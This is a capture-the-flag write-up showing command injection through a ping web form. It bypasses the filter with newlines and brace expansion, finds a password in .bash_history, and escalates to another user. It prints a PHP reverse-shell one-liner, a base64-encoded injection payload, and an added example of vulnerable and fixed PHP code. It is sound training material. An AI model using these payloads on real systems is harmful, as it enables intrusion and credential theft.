RCE can lead to privilege escalation

The Shellmates club has designed a great set of infosec challenges. Today we will be solving "RCE to privilege escalation".

This challenge can be found at http://web.challs.shellmates.club/

The challenge description states our task:

My friend made a simple web application that pings hosts on the internet to see if they’re up. When I asked him if he thought about the security part, he seemed so confident and started talking about his filter.
Go there and prove to him that his web application is not that secure by leaking the content of /home/ctf/flag.txt.

From the task we know that we need to bypass the filter on the `ip` input in order to inject OS commands, which will be executed with the privileges of the vulnerable application.

Information gathering

We know that if the ping response has a TTL of 128, the target is probably running Windows, and if the TTL is 64, the target is probably running some variant of Unix. By analyzing the response we can say that the target is running Linux.

Steps to reproduce RCE

When we supply `ip=127.0.0.1;ls` we get 'Okay BOOMER' as the response. Let's try to bypass this check in order to get our OS command executed.

Yupi, just by LF injection (a newline is a command separator on Linux, which we know is there) we can see the index.php file. It's good, it's over: 'We are hackers and hackers have black terminals with green font colors' :) Let's now try to cat our /home/ctf/flag.txt by sending 'ip=127.0.0.1\ncat /home/ctf/flag.txt'.

Wait, what? Why is that?! OK, it won't be executed since the whitespace character got URL-encoded to +, which might be blacklisted.

Hmm, now what are we doing :( We somehow need to bypass the whitespace character in order to execute any command at all.

So after trying a bit I found a way, assuming a shell that supports csh-like brace expansion: for example `{ls,-lah}` expands to `ls -lah`, so it will list all files without using any whitespace.

OK, we successfully bypassed the whitespace filter, but we cannot see anything inside flag.txt, since we do not have permission to read the file. On the other hand, one thing confused me: why can't I see the bash error 'Permission denied'?

Let's try to see the content of index.php, as long as the read permission is set for others.

OK, we can clearly see the part `2> /dev/null`, which tells bash to redirect errors to /dev/null, and this is why we did not get 'Permission denied' above.
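To show why this kind of filter fails and what the fix looks like, here is an added example (not the challenge's own index.php, which this writeup only reads in part): a hypothetical character-blocklist ping handler of the kind described above, followed by an allowlist version that validates the host before any shell is involved. The exact blocklist characters and all function names are assumptions.

```php
<?php
// Added example; the real index.php is not reproduced in this writeup.

// Hypothetical blocklist: rejects ';', '&', '|', spaces and '+', and nothing else.
// The shell also treats a bare newline as a command separator and brace expansion
// can stand in for spaces, so this list does not confine the input to one command.
function ping_blocklist(string $ip): string {
    if (preg_match('/[;&| +]/', $ip)) {
        return 'Okay BOOMER';
    }
    // The raw value is interpolated into a shell line; stderr is discarded, which is
    // also why the 'Permission denied' messages were missing in the responses above.
    return (string) shell_exec("ping -c 1 $ip 2> /dev/null");
}

// Allowlist: the value must be a syntactically valid IP address or hostname.
// Anything else is rejected before a shell is ever started.
function is_allowed_host(string $host): bool {
    return filter_var($host, FILTER_VALIDATE_IP) !== false
        || filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
}

function ping_allowlist(string $host): string {
    if (!is_allowed_host($host)) {
        return 'Invalid host';
    }
    // Validation already confines the value; escapeshellarg is a second layer so the
    // host can only ever become a single argv entry of ping. (On PHP >= 7.4, passing
    // an array to proc_open avoids the shell entirely and is better still.)
    $cmd = 'ping -c 1 ' . escapeshellarg($host) . ' 2>&1';
    return (string) shell_exec($cmd);
}

// Constructed sample inputs: two legitimate hosts, then two values that contain
// shell syntax the blocklist does not catch but the allowlist rejects.
foreach (["127.0.0.1", "example.com", "127.0.0.1\nid", "{ls,-lah}"] as $input) {
    printf("%-22s blocklist: %-7s allowlist: %s\n",
        json_encode($input),
        preg_match('/[;&| +]/', $input) ? 'reject' : 'pass',
        is_allowed_host($input) ? 'pass' : 'reject');
}
```

Running it prints pass/pass for the two real hosts and pass/reject for the two malformed values, which is the whole difference between a blocklist and an allowlist here.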

Now let's see what is inside the .bash_history of the ctf user.

What is .bash_history file ?

A file created by Bash, a Unix shell commonly used on macOS and Linux. It stores a history of the commands the user entered at the command prompt and is used for viewing old commands that have been executed.

OK, in a real-life scenario .bash_history would only contain the old commands that the user executed; in this case .bash_history has been modified and we can clearly see the string Qu4r4Nt1n3d!@, which we assume to be the password of the ctf user.

Steps to reproduce privilege escalation

Now we only need to make a horizontal privilege escalation from the www-data user to the ctf user in order to read the content of flag.txt. This step can be done just by `su` to the ctf user, since we have the password for this user.

However, we cannot inject this command in the way above, since the `su` command has no option like `-p` to supply the password on the command line, so I need to get a reverse shell.

Since we know that php works perfectly in this vulnerable application, we can use a php payload for our reverse shell:

php -r '$sock=fsockopen("my-ip",442);exec("/bin/bash -i <&3 >&3 2>&3");'

However, we know that the application does not accept some characters like ; and so on, so the best way is to encode the payload with base64.

My payload will look like:

127.0.0.1\n{echo,'cGhwIC1yICckc29jaz1mc29ja29wZW4oIm15LWlwIiw0NDIpO2V4ZWMoIi9iaW4vYmFzaCAtaSA8JjMgPiYzIDI+JjMiKTsnCg==',|,base64,-d,|bash}

It does not work, OMG, but why :( After a while I tried this on my local machine and got weird errors like `,base64,-d,: command not found` and `Command 'bash}' not found, did you mean:`. Why is this?!

After a bit I realized that the braces {} only accept a command with its options: the words between the commas are passed as plain arguments, so a pipe | or a redirect > inside {} does not work. So I need to create two sets.

We somehow need a method to use | while still using our {}. For example, the command `ls | grep a` can be written as `ls|{grep,a}` and is successfully executed, whereas `{ls,|,grep,a}` does not work :).

Woah! That's nice, let's try to construct our payload again:

127.0.0.1\n{echo,'cGhwIC1yICckc29jaz1mc29ja29wZW4oIm15LWlwIiw0NDIpO2V4ZWMoIi9iaW4vYmFzaCAtaSA8JjMgPiYzIDI+JjMiKTsnCg=='}|{base64,-d}|bash

Yupi, we successfully got a reverse shell. But wait, we cannot `su` to the ctf user, why is that?!

I need to upgrade my shell to a proper TTY in order to execute the `su` command, by spawning a TTY with python.

We have successfully completed the challenge :)

cybersec enthusiasts & full stack web dev #web #pwn #reverse #crypto